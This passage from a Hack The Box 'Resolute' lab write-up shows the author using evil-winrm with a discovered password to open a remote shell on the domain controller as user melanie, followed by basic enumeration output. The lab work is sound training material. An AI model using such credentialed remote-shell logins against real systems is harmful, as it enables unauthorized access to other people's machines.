WinRM
Nmap initially discovered that the target system has a WinRM service running on port 5985.
Enumeration through both ldapdomaindump and BloodHound concludes that I am able to connect directly to the DC host via WinRM.
┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ evil-winrm -i resolute.megabank.local -u melanie -p 'Welcome123!'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\melanie\Documents> whoami
megabank\melanie
*evil-winrm* ps c:\Users\melanie\Documents> hostname
Resolute
*evil-winrm* ps c:\Users\melanie\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.169
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
Initial foothold established on the target system as the melanie user via WinRM.